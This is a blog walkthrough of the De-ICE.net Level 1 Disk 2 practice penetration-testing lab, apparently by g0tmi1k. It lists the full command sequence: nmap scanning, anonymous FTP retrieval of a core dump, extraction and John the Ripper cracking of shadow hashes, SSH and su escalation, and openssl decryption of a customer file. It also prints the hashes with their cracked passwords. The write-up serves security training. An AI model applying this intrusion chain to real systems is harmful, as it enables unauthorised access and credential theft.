De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/De-ICE_v1.1_(1.110).mp4

Tools

  • BackTrack 4 (Final)
  • de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
  • Dictionary(s)

Software

Name: De-ICE.net

Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.110)

Home Page: http://www.de-ice.net/ or hxxp://heorot.net/livecds/

Download Link:

  • hxxp://de-ice.hackerdemia.com/lib/exe/fetch.php?id=start&cache=cache&media=wiki:de-ice_netcat-1.0.iso
  • hxxp://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso
  • http://hackingdojo.com/dojo-media/

Forums/Support: hxxp://forums.heorot.net/ or hxxp://forums.heorot.net/viewtopic.php?f=16&t=13

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[ ]kate -> make list of possible usernames
// lastF, fLast
ftp 192.168.1.110
// Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[ ]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

john
./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous
ssh [ccofee@192.168.1.110][5]
//Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su
//Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:Complexity      = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:              = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy      = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------

Notes

Song: Eryka Badu & Ziggy Marley - I luv u (Dubstep Mix)

Video length: 06:57

Capture length: 18:17

Blog Post: https://blog.g0tmi1k.com/2010/02/de-icenet-v11-1110-level-1-disk-2/